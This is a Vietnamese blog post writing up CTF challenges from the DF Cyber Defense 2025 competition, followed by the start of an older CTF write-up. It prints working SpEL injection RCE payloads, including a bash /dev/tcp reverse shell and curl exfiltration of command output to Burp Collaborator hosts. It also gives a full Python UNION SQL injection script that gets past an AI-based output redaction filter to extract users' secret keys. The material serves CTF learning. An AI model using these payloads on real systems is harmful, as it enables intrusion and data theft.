Chia sẻ là niềm vui

Tôi đã đóng góp gì để cùng team vô địch DF Cyber Defense 2025? - King of the hill

Manhnv — Sun, 28 Sep 2025 19:52:37 GMT

I. Tổng quan

Giới thiệu - Flexing

Cuối tháng 9 vừa qua cụ thể là 21/09/2025-25/09/2025, DF Cyber Defense 2025 – cuộc thi thường niên về Diễn tập tấn công phòng chủ trên không gian mạng cho lĩnh vực Ngân hàng, tài chính tại Việt Nam đã được tổ chức. Kết thúc cuộc thi, team VNDIRECT chúng tôi – đại diện cho Công ty Cổ phần Chứng Khoán VNDIRECT giành chức vô địch.

(Dạo này mình mới qua công ty VNDirect (Cũng đã được 6 tháng) việc mới + nhiều thứ mới nên là không có thời gian viết blog.)

Giải thi đấu gồm có 2 vòng thi:

Online diễn ra vào ngày 21/09/2025
Onsite diễn ra tại khách sạn JW Marriott (Hà Nội) vào ngày 25/09/2025

Các vòng thi đều có đủ 2 phần là: King of the hill và Jeopardy.

Jeopardy thì các bạn chơi CTF nhiều thì cũng đã biết về thể loại này rồi nên mình không nhắc đến nữa.

King of the hill thì theo như mình thấy và cũng như BTC nói thì đây là thể loại mà ở Việt Nam lần đầu tiên tổ chức, nên nó khá mới mẻ và hấp dẫn.

Các đội phải giữ tổng cộng 5 hill như hình bên trên, điểm giữ hill sẽ được tính như sau:

Top 10 vòng thi Online sẽ được cộng điểm ưu thế cho vòng thi Onsite

(Hình minh họa 2 phần thi bên dưới mình chỉ chụp của ngày online của ngày onsite mình quên chụp)

Các bạn có thể đọc thêm về thể lệ cuộc thi ở đây: https://drive.google.com/file/d/1vTTKE8vAz4u1R6ga_etJDWcFM-USqe09/view?usp=sharing

Mỗi team sẽ có 4 người tham gia thi đấu, nhưng riêng bọn tôi có thêm 1 đội quân thi đấu khác nữa đó là Đội quân tâm linh

→ Có thờ có thiêng, có kiêng có lành đúng không mấy Ní

Kết quả cuộc thi

Với vòng Online thì team mình đã may mắn dẫn đầu với tổng điểm là: 1180 điểm

Điểm King of the hill là: 980
Mình giải được 1 challenge Jeo: 200

Với vòng Onsite chúng tôi may mắt đạt được tổng điểm là: 1086 điểm

King of the hill: 686
Jeopardy: 400 (giải được 2 challenge)

→ Nhưng với lợi thế là chiến thắng vị trị thứ 1 ở vòng Online nên được +200 điểm vào điểm chung cuộc vòng Onsite nên tổng điểm cuối cùng chúng tôi có là: 1286 (Vượt trội hơn hẳn so với đội về thứ 2)

Hôm nay, tôi viết xuống bài viết này không phải mục đích là khoe mà tôi muốn chia sẻ niềm vui này tới mọi người cũng như viết xuống cách giải quyết những challenge mà chúng tôi gặp phải trong quá trình thi đấu.

(Vì trong cuộc thi này, tôi đảm nhận nhiệm vụ giải Jeopardy và giữ hill web/API và cũng lâu lâu giữ Hill AI Fraud → Nên tôi chỉ viết xoay quanh những thứ tôi làm được, còn những phần A/E khác làm để tôi lừa lừa họ viết Blog sau)

Cụ thể là ở cả 2 vòng tôi đảm nhận:

Giữ hill-1: Online được 75 điểm, Onsite được 70 điểm
Giải các challenge Jeopardy: Online được 1 Jeopardy, Onsite được 2 Jeopardy.

II. Write up Jeopardy vòng thi Onsite

FinovaBank Statement

Đề bài

Challenge này chúng ta được cho 1 trang web có tên là FinovaBank - Statement viewer. Vào xem thì có chức năng search Transaction search.

Phân tích

Theo thói quen của tôi là tôi luôn search thử vài mẫu test có kèm theo các ký tự đặc biệt như ’ ” … mục đích là để xem phản ứng của server.

Tất nhiên rồi, khi pentest thì chúng ta đề phải setup Burpsuite, và khi bấm submit request xong web ui trả về No results thì tôi kiểm tra burpsuite history của mình và phát hiện response trả về có lỗi.

HTTP/1.1 500 
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 28 Sep 2025 17:33:15 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 211

{"timestamp":"2025-09-28T17:33:15.960+00:00","status":500,"error":"Internal Server Error","message":"Expression [ \"test\"\" ] @1: EL1045E: Cannot find terminating \" for string","path":"/api/statements/search"}

Ý tôi ở đây là lỗi (bug), không phải lỗ hổng bảo mật. Tuy nhiên trong message lỗi là một mã lỗi Expression EL1045E, tôi tò mò tìm kiếm google thử:

Đại ý google trả về là Expression EL1041E is a Spring Expression Language (SpEL) parsing error that occurs when the parser encounters unexpected data after it has already successfully parsed a complete, valid expression. It indicates that there's extra, invalid characters or tokens at the end of an expression string, such as an extra colon (:), comma (,), or curly brace ({) where they are not expected, leading to the parsing failure.

Mộ ví dụ về Spring Expression Language (SpEL)

// Hello SpEL — toán học cơ bản
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.Expression;

public class SpelDemo {
    public static void main(String[] args) {
        ExpressionParser parser = new SpelExpressionParser();

        Expression exp = parser.parseExpression("1 + 2 * 3");
        Integer result = exp.getValue(Integer.class);

        System.out.println("Kết quả: " + result); // 7
    }
}

OK, thì theo thói quen thôi có Expression lại còn phản ứng lỗi khi mà gửi ký tự đặc biệt vào thì có khả năng cao là có lỗ hổng lắm.

Vì suy nghĩ của tôi đơn giản như thế này: Expression thì sẽ là xử lý 1 cái gì đó? Vậy cái gì đó lại phản ứng lại với input tôi gửi lên → chứng tỏ 1 điều dev không hề validate input và ném thẳng vào cho Expression xử lý thì mới có chuyện nó phản ứng lại như vậy.

Thì tất nhiên rồi, điều đầu tiên cần làm là xem thằng cha Spring Expression Language (SpEL) có tồn tại lỗ hổng bảo mật nào không đã, tôi thì tôi hay search kiểu đại loại như:

Spring Expression Language (SpEL) exploit
Spring Expression Language (SpEL) vuln
Spring Expression Language (SpEL) cve
…

Đó, thì khi tìm kiếm với từ khóa như trên thì cũng thấy có tý hi vọng, thấy là cũng toàn title là có lỗ hổng rồi đấy, thậm chí là RCE.

À thì ra Spring Expression Language (SpEL) có lỗ hổng bảo mật có thể RCE, giải thích thì dài dòng như tôi khuyên bạn nên đọc link này để hiểu rõ trước về lỗ hổng này đã rồi đọc tiếp bài nhé: https://www.mgm-sp.com/identifying-and-preventing-remote-code-execution-rce-with-spring-expression-language-spel

Ok, coi như bạn đã hiểu về lỗ hổng trên nhé, tôi sẽ đi thẳng vào tìm cách khai thác luôn nhé.

Trước hết tôi thử xóa bớt đi 1 số parram và chỉ chừa lại customerName với value là test%22, thì server vẫn giãy nảy lên như lúc tôi thử ban đầu.

-> Để ý dòng chữ này nha Cannot find terminating \" for string → À à là sao nhỉ? là khi thêm “ vào thì nó bị thừa ” ra hay gì mà nó lại bảo Cannot find terminating \" for string → À kiểu nó phải thế à.

Thử làm thám tử Conan dự đoán code có thể đang chạy trên server xem sao nha.

// Controller
@RestController
@RequestMapping("/api/statements")
public class StatementController {

    private final StatementService statementService;

    public StatementController(StatementService statementService) {
        this.statementService = statementService;
    }

    @GetMapping("/search")
    public ResponseEntity> search(@RequestParam("customerName") String customerName) {
        List results = statementService.search(customerName);
        return ResponseEntity.ok(results);
    }
}

// Service
@Service
public class StatementService {

    private final StatementRepository repo;
    private final ExpressionParser parser = new SpelExpressionParser();

    public StatementService(StatementRepository repo) {
        this.repo = repo;
    }

    public List search(String customerName) {
        List allStatements = repo.findAll();  // lấy dữ liệu từ DB

        List filtered = new ArrayList<>();
        for (Statement s : allStatements) {
            // Đoạn code có thể là lỗi ở đây
            // build biểu thức bằng cách ghép chuỗi từ input
            String expr = "\"" + customerName + "\" == \"" + s.getCustomerName() + "\"";
            Boolean match = parser.parseExpression(expr).getValue(Boolean.class);
            if (Boolean.TRUE.equals(match)) {
                filtered.add(s);
            }
        }
        return filtered;
    }
}

// Repository (giả định dùng JPA)
@Repository
public class StatementRepository {
    @PersistenceContext
    private EntityManager em;

    public List findAll() {
        return em.createQuery("SELECT s FROM Statement s", Statement.class)
                 .getResultList();
    }
}

Bên trên là 3 đoạn code mà tôi giả sử hình dung là server nó sẽ chạy kiểu kiểu thế thì nó mới xảy ra cái lỗi Cannot find terminating \" for string khi mà cho thêm ” vào input, cụ thể là param: customerName

Bây giờ thì chúng ta có thể dễ hình dung hơn rồi heng.

Vì sao lỗi xảy ra? (Đoạn này là đang ngồi hình dung thôi nha, chưa biết gì đâu)

Input: customerName=test"
Ghép vào: "test"" == "John Smith" → SpEL parser đọc "test"" → chuỗi literal không đóng đúng → ném lỗi EL1045E: Cannot find terminating “ for string.
Nếu input là test"" → thành "test""" == "John Smith". Trong một số parser, cặp "" được hiểu như escape cho dấu " bên trong string → không lỗi và trả về 1 mảng rỗng.

Như dự đoán, nếu tôi thử test%22%22 thì có vẻ không còn lỗi nữa.

Như vậy ta đã biết bên ta có thể truyền 1 biểu thức vào parseExpression để cho nó chạy và tay cũng hình dung ra được là có 1 UNTRUSTED DATA đang được truyền vào với công thức: "\"" + UNTRUSTED DATA + "\" == \"" + s.getCustomerName() + "\"";

Ok, nhiệm vụ của chúng ta bây giờ phải làm sao cho PAYLOAD truyền vào nó phải chạy được đã, để nó không raise ra lỗi.

Tôi có hỏi qua ChatGPT thì trong SpEL thì các toán tử sẽ là and/or, … như hình bên dưới.

test"=="test" and  and "1" == "

Và có thể bạn cũng biết BIỂU THỨC đó cũng có thể là 1 đoạn mã JAVA.

test"=="test" and Hello() == 1 and "1" == "

Khai thác

Vậy thì mã JAVA ở đây là gì? để chúng ta có thể khai thác được.

Thì các bạn mà hay RCE với các ứng dụng java thì cũng biết đến mấy lệnh T(java.lang.Runtime).getRuntime().exec('')

T(java.lang.Thread).sleep(10000) // Cho server sleep 10000
T(java.lang.Runtime).getRuntime().exec('id') // Chạy lệnh ID
T(java.lang.Runtime).getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp//8443 0>&1\") // Revershell
(T(java.lang.Runtime).getRuntime().exec('sh -c $@|sh . echo curl aiwbvvnstnmkc4yj1aw8hyqm8de32s.burpcollaborator.net/?=`id|base64 -w0`')) // Out of band get command ID

OK, bây giờ mình cần chứng minh rằng mình có thể chạy lệnh trên server nên mình sẽ dùng payload

(T(java.lang.Runtime).getRuntime().exec('sh -c $@|sh . echo curl aiwbvvnstnmkc4yj1aw8hyqm8de32s.burpcollaborator.net/?=`id|base64 -w0`'))

→ Thay aiwbvvnstnmkc4yj1aw8hyqm8de32s.burpcollaborator.net bằng burpcollaborator của bạn.

Câu lệnh nó đại loại kiểu

test"=="test" and (T(java.lang.Runtime).getRuntime().exec('sh -c $@|sh . echo curl dtaq2nsw8ej2zpk0nw0yb65hv81zpqdf.oastify.com/?=`id|base64 -w0`')) == 1 and "1" == "

Với một request Burpsuite kiểu

Kiểm tra burpcollaborator thì thấy đã có 1 request http trả về

\=> Decode base64 dWlkPTEwMDAgZ2lkPTEwMDAgZ3JvdXBzPTEwMDAK ta được uid=1000 gid=1000 groups=1000 → Vậy chứng minh rằng ta có thể chạy lệnh trên server.

Bây giờ ta cần tìm xem flag nằm ở đâu trên server, trước tiên là chạy lệnh ls /

test"=="test" and (T(java.lang.Runtime).getRuntime().exec('sh -c $@|sh . echo curl dtaq2nsw8ej2zpk0nw0yb65hv81zpqdf.oastify.com/?=`ls /|base64 -w0`')) == 1 and "1" == "

Ta nhận được

→ Vậy flag sẽ nằm tại /-flag.txt

Get flag

test"=="test" and (T(java.lang.Runtime).getRuntime().exec('sh -c $@|sh . echo curl dtaq2nsw8ej2zpk0nw0yb65hv81zpqdf.oastify.com/?=`cat /-flag.txt|base64 -w0`')) == 1 and "1" == "

Nhận được flag là: DF25{Y0u_c0UlD_5p3L_7h3_3xpr35510N!!}

Next-gen WAiF (TODO)

Đề bài

Vào link web BTC cho thì chúng ta có

Sau khi nhập Team token do BTC cung cấp thì ta có

Phân tích

Okey, nhìn vào hình trên thì ít nhất chúng ta cũng có thể thấy được 1 số thông tin như sau:

Available Endpoints:

GET /users/ Retrieve user information by ID
GET /search?q= Search for users by query term
GET/POST /flag Submit the 3 users' secret_key values to claim the flag

Đặc biệt nhất là: Hint: Tất cả output HTTP sẽ được đi qua hệ thống AI filtering và dữ liệu nhạy cảm sẽ bị redact thành ********.

Bây giờ tôi thử xem từng enpoint 1 nhé.

GET/POST /flag

Với GET request chúng ta sẽ có 1 form submit như thế này

→ Trong DB có tổng cộng 3 users. Player cần phải trích xuất đủ cột secret_key của 3 users để chứng minh bạn đã bypass hoàn toàn hệ thống AI filtering. => Như vậy trong hình dung của tôi là bài này là 1 kiểu nào đó lấy được 3 secret_key của 3 users để submit vào đây rồi.

Đương nhiên rồi, POST request chính là khi có secrets và bấm Nộp.

GET /search?q=

GET /users/

\=> có thể thấy được là với /search và /users thì các thông tin nhạy cảm đã được redact thành ********

Thử nghiệm với SQL injection

Đối với các bạn không biết thế nào nhưng với tôi khi mà nhìn thấy 2 enpoints /search và /users như trên thì điều đầu tiên tôi không thể bỏ qua là SQL injection và IDOR, tuy nhiên trong trường hợp này tôi không test IDOR nữa vì như các bạn thấy hình trên các thông tin nhạy cảm đã được redact thành ******** => IDOR có vẻ vô dụng trong trường hợp này.

Tôi đã thử SQL injection lên cả 2 enpoints, tuy nhiên với /users tôi đã thử đủ kiểu nhưng không thấy có sự phản hồi nào mang lại cảm giác là SQL injection sẽ ở chỗ này.

Khi tôi thử sang enpoint /search, thì với chức năng search này mình phải nghĩ đến là thử UNION Based.

Lúc đầu, khi vào http://152.42.200.249:8111/search thì có vẻ dữ liệu trả về là 12 cột

Như vậy thì đơn giản rồi chỉ cần viết câu lệnh UNION để thử thôi.

'   UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from users-- -

Khi chạy lên thì sẽ thấy có sự xuất hiện của các các trường address: 5 , dob:6, username:2, tôi sẽ không quan tâm trường ID lắm → Vì trường ID như thấy trong hình phần trên nó là dạng Int, mà tôi cần trích xuất secret nên int có vẻ không tác dụng lắm.

Okey, bây giờ tôi đã biết rằng mình có thể làm sao đó để leak secret key thông qua:

address
dob
username

Các bạn đang nghĩ là: Ồi! giờ thì đơn giản, chỉ cần select trương secret_key để vào trong 3 trường trên là được đúng không?

Các bạn nghĩ:

'   UNION SELECT 1,2,3,4,secret_key,6,7,8,9,10,11,12 from users-- -

Nhầm, nếu dễ thế thì đã không có chuyện để nói. Hãy nhớ lại Hint: Tất cả output HTTP sẽ được đi qua hệ thống AI filtering và dữ liệu nhạy cảm sẽ bị redact thành ********.

Thấy chưa ạ? hehe, vậy thì chúng ta không thể cứ thế mà lấy đâu nhe, ta cần nghĩ ra 1 cách nào đó tricky hơn, ví dụ như:

'   UNION SELECT 1,2,3,4,printf("M%s", substr(secret_key,1,1)),6,7,8,9,10,11,12 from users-- -

Giải thích printf("M%s", substr(secret_key,1,1)) : Mục đích tôi muốn lấy ký tự thứ 1 trong secret_key và nối với prefix là M (M là chữ cái đầu tên mình).

Thế nhưng, như thế này thì mỗi request tôi chỉ lấy được 1 key thôi ư? tôi có đến tận ít nhất 3 trường có thể đọc được dữ liệu là address, dob, username cơ mà. Bây giờ tôi sẽ nhồi nó vào thôi.

'   UNION SELECT 1,printf("M%s", substr(secret_key,3,1)),3,4,printf("M%s", substr(secret_key,1,1)),printf("M%s", substr(secret_key,2,1)),7,8,9,10,11,12 from users-- -

Như vậy tôi có thể đoán đoán là một chuỗi gì đó dạng CBJ***

Như hint đã cho là có tận 3 users lận, nên tôi nghĩ đến việc dùng UNION ALL để có thể lấy được tất cả cùng 1 lúc.

'   UNION ALL SELECT 1,printf("M%s", substr(secret_key,3,1)),3,4,printf("M%s", substr(secret_key,1,1)),printf("M%s", substr(secret_key,2,1)),7,8,9,10,11,12 from users-- -

Vậy thì giờ ta chỉ cần viết 1 vòng loop cho chạy với bước nhảy là 3 và request lên server là ok:

for i in range(1, 100, 3):
    # Request to server

→ Hãy xem mã khai thác đầy đủ bên dưới.

Khai thác

# 0xmanhnv
import requests
from urllib.parse import quote_plus


final_secret1 = ""
final_secret2 = ""
final_secret3 = ""

for i in range(1, 100, 3):

    # Thay bằng target bạn có quyền test, ví dụ: http://localhost:8111
    base_url = "http://152.42.200.249:8111/search"


    first_char = f'printf("M%s", substr(secret_key,{i},1))'
    second_char = f'printf("M%s", substr(secret_key,{i+1},1))'
    third_char = f'printf("M%s", substr(secret_key,{i+2},1))'

    # Put a harmless query here by default. Replace ONLY if you have explicit authorization.
    payload = f"'   UNION ALL SELECT 1,{third_char},3,4,{first_char},{second_char},7,8,9,10,11,12 from users-- -"

    # URL-encode the query parameter
    params = {"q": payload}
    # Or build full URL manually:
    full_url = f"{base_url}?q={quote_plus(payload)}"

    # Headers (copy from your original request as needed)
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; ExampleBot/1.0)",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "keep-alive",
        # "Upgrade-Insecure-Requests": "1",  # optional
    }

    # Cookies (only include cookies you legitimately have)
    cookies = {
        "team_session": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJWTkRJUkVDVC03YzllMWIyZDU0YTMiLCJ0ZWFtX2FiYnIiOiJWTkRJUkVDVCIsInRlYW1fZnVsbF9uYW1lIjoiQ1x1MDBmNG5nIHR5IGNcdTFlZDUgcGhcdTFlYTduIGNoXHUxZWU5bmcga2hvXHUwMGUxbiBWTkRJUkVDVCIsImlzcyI6ImFpLWZyYXVkLWNoYWxsZW5nZSIsImlhdCI6MTc1ODg2ODI1MCwiZXhwIjoxNzU4OTU0NjUwfQ.A1Qx6h0ThCI07VAQwx9KjPbG9OueAy45HEM-pXWrYCI"
    }

    secret1=""
    secret2=""
    secret3=""

    # Use a session for connection reuse
    with requests.Session() as s:
        s.headers.update(headers)
        # If you prefer to pass params separately:
        r = s.get(base_url, params=params, cookies=cookies, timeout=15)

        print("Requested URL:", r.url)
        print("Status code:", r.status_code)
        # Print first N characters of the response body for quick inspection
        print("--- Response---")
        results1 = r.json().get("results")[len(r.json().get("results")) - 3]
        results2 = r.json().get("results")[len(r.json().get("results")) - 2]
        results3 = r.json().get("results")[len(r.json().get("results")) - 1]

        secret1 += results1.get("address").replace("M", "")
        secret1 += results1.get("dob").replace("M", "")
        secret1 += results1.get("username").replace("M", "")

        secret2 += results2.get("address").replace("M", "")
        secret2 += results2.get("dob").replace("M", "")
        secret2 += results2.get("username").replace("M", "")

        secret3 += results3.get("address").replace("M", "")
        secret3 += results3.get("dob").replace("M", "")
        secret3 += results3.get("username").replace("M", "")

        # if results1.get("address").replace("M", "") == "" and results1.get("dob").replace("M", "") == "" and results1.get("username").replace("M", "") == "":
        #     break

        final_secret1 += secret1
        final_secret2 += secret2
        final_secret3 += secret3
        print(final_secret1)
        print(final_secret2)
        print(final_secret3)

print(final_secret1) 
print(final_secret2) 
print(final_secret3)

Tiến hành chạy mã khai thác.

                                               _oo0oo_
                                              o8888888o
                                              88" . "88
                                              (| -_- |)
                                              0\  =  /0
                                            ___/`---'\___
                                          .' \|     |// '.
                                         / \|||  :  |||// \
                                        / _||||| -:- |||||- \
                                       |   | \  -  /// |   |
                                       | \_|  ''\---/''  |_/ |
                                       \  .-\__  '-'  ___/-. /
                                     ___'. .'  /--.--\  `. .'___
                                  ."" '<  `.___\_<|>_/___.' >' "".
                                 | | :  `- \`.;`\ _ /`;.`/ - ` : | |
                                 \  \ `_.   \_ __\ /__ _/   .-` /  /
                             =====`-.____`.___ \_____/___.-`___.-'=====
                                               `=---='

                             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                Buddha Bless: Critical Bugs Incoming
➜  walif git:(main) ✗ python3 exp.py
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C3%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C1%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C2%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJ
CBJ
CBJ
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C6%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C4%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C5%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_S
CBJS_S
CBJS_S
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C9%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C7%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C8%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECR
CBJS_SECR
CBJS_SECR
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C12%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C10%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C11%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_
CBJS_SECRET_
CBJS_SECRET_
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C15%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C13%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C14%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nha
CBJS_SECRET_lin
CBJS_SECRET_duc
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C18%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C16%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C17%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nhan_9
CBJS_SECRET_linh_e
CBJS_SECRET_duc_h6
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C21%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C19%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C20%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nhan_9f8e
CBJS_SECRET_linh_e3f9
CBJS_SECRET_duc_h6j4k
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C24%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C22%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C23%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nhan_9f8e2d1
CBJS_SECRET_linh_e3f9a8b
CBJS_SECRET_duc_h6j4k8l2
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C27%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C25%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C26%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nhan_9f8e2d1c4b
CBJS_SECRET_linh_e3f9a8b2c7
CBJS_SECRET_duc_h6j4k8l2m9n
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C30%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C28%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C29%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nhan_9f8e2d1c4b7a5
CBJS_SECRET_linh_e3f9a8b2c7d1x
CBJS_SECRET_duc_h6j4k8l2m9n5p7
Requested URL: http://152.42.200.249:8111/search?q=%27+++UNION+ALL+SELECT+1%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C33%2C1%29%29%2C3%2C4%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C31%2C1%29%29%2Cprintf%28%22M%25s%22%2C+substr%28secret_key%2C32%2C1%29%29%2C7%2C8%2C9%2C10%2C11%2C12+from+users--+-
Status code: 200
--- Response---
CBJS_SECRET_nhan_9f8e2d1c4b7a5k3m
CBJS_SECRET_linh_e3f9a8b2c7d1x5y9
CBJS_SECRET_duc_h6j4k8l2m9n5p7q1a

Sau khi chạy chúng ta nhận được 3 chuỗi secret

CBJS_SECRET_nhan_9f8e2d1c4b7a5k3m
CBJS_SECRET_linh_e3f9a8b2c7d1x5y9
CBJS_SECRET_duc_h6j4k8l2m9n5p7q1a

Get flag

Truy cập http://152.42.200.249:8111/flag và nhập 3 chuỗi Secret vào.

Submit và nhận được flag DF25{we_will_become_cyborg_in_AI_era}

Cập nhật ngày 07/10/2025

Mình tính viết tiếp mấy challenge mình đã giải được nhưng BTC cuộc thi đã tung ra mã nguồn cũng như solution về các challenge rồi, nên thôi không viết tiếp nữa.

Các bạn có thể vào link BTC đăng để đọc nhé: https://github.com/CyberJutsu/Challenge-Writeups

Cảm ơn các bạn và kết hoạch sắp tới

Cảm ơn các bạn đã đọc bài viết của mình, dù mình đã lâu không còn viết blog nhưng khi viết một bài mới cũng bất ngờ vì các bạn còn nhớ đến mình và ủng hộ rất nhiều.

Nhưng đọc xong nhớ comment vào nhé mấy Ní :D

Nhân đây mình cũng muốn thông báo là sắp tới mình sẽ có ra thêm 1 loạt series về các kỹ thuật/Công cụ sử dụng trong redteam.

Các bạn nhớ đón đọc nhé.

Tuyển dụng

Team mình vẫn đang liên tục tuyển dụng số lượng lớn Product security/Application security, nếu A/E nào có như cầu thì liên hệ mình nhé.

Thông báo chuyển blog

Manhnv — Sat, 08 Feb 2025 11:06:54 GMT

Trước dây blog mình được build bằng hugo và deploy lên gihub, bây giờ mới nhận thấy một số vấn đề bất tiện nên mình quyết định chuyển nền tảng, nên các bài blog trước đó chưa thể migration lên kịp.

Nếu các bạn có hứng thú với các bài blog cũ của mình thì có thể đọc nó tại: https://viblo.asia/u/0xmanhnv

Mình xin cảm ơn!!!

Giật lì xì ‘rắn thần tài’ cực hay - CTF writeup

Manhnv — Sat, 08 Feb 2025 10:57:11 GMT

Xin chào độc giả của blog manhnv.com, tính từ lần cuối mình post bài lên blog 19/05/2022 đến nay cũng đã là 1000 ngày.

Để kỷ niệm 1000 ngày chưa post bài, nhân dịp giật được lì xì đầu năm của anh Mạnh Luật và anh Luật có gửi lời comeback viết writeup nên hôm nay mình quyết định dành chút thời gian viết lại writeup bài CTF do Cyberjutsu dựng có tên là: Rắn Thần Tài

wait a minute! Hãy like và subscribe vì nó miễn phí

Đề bài

Đề bài là 1 website cùng một số mô tả về flag như trên hình.

Đặc biệt flag này có “vô số Easter Egg, ai tìm đủ Easter Egg sẽ có được mã lì xì Momo!” → Đây là lý do chính mình chơi bài CTF này :))) hehe :))) hehe :)))

(Vì là bài này viết cho các bạn chưa biết gì cũng học hỏi được, nên mình viết kỹ và chi tiết xíu nhé!!!)

Recon

Chuẩn bị

Chúng ta setup Burpsuite thì về cơ bản chắc các bạn biết rồi, trên hình chỉ là mình thêm target scope vào Burpsuite để xíu nữa filter nhìn đống HTTP history cho đỡ rối (bài nhập môn pentest nên là cái này mình không nói lại nữa nhé)

Truy cập vào link web để xem thử mặt mũi nó ra làm sao, thì nhận được 1 trang web như sau

Tuy trang đầu thôi, nhưng chúng ta cũng có 1 số thông tin có thể thu thập vào lưu ý:

Web được dựng từ ASP.NET
Có link tới chức năng chơi game (Link này được thêm vào sau này, khi mình làm bài này thì link này đang để ẩn phải fuzz mới ra, nên mình cứ làm theo thứ tự như mình là nhé và coi như chưa biết link game)

Công việc đặt ra bây giờ là đi do thám và và khám phá xem web này là web gì? hoạt động ra làm sao?…

Directory scanning

Web hiển thị ra chỉ là mấy dòng chữ mình không thể biết được liệu đằng sau nó có chức năng gì khác không, nên mình sử dụng kỹ thuật gọi là directory scanning để tìm kiếm các đường dẫn ẩn, công cụ mình sử dụng có tên là: Gobuster

(Lưu ý: Để tránh bài viết quá dài mình sẽ không hướng dẫn lại các sử dụng nữa mà các bạn phải tự vào document của công cụ để đọc, mình chỉ đưa câu lệnh mình đã sử dụng vào bài thôi)

gobuster dir -u http://206.189.39.54:8085  -w ~/Tools/SecLists/Discovery/Web-Content/common.txt -x asp,aspx,conf,config,txt,html,htm -t 50

Sau khi chạy xong mình đã thu thập được 1 số URL, và mình sẽ tiến hành truy cập vào từng URL đó để xem nó là gì.

/Home
/game
/robots.txt

Tiếp tục thử scan dir thêm 1 lần nữa với /game

gobuster dir -u   -w ~/Tools/SecLists/Discovery/Web-Content/common.txt -x asp,aspx,conf,config,txt,html,htm -t 50

Qua bước này thu thập được thêm các URL

/game/Index
/game/feedback

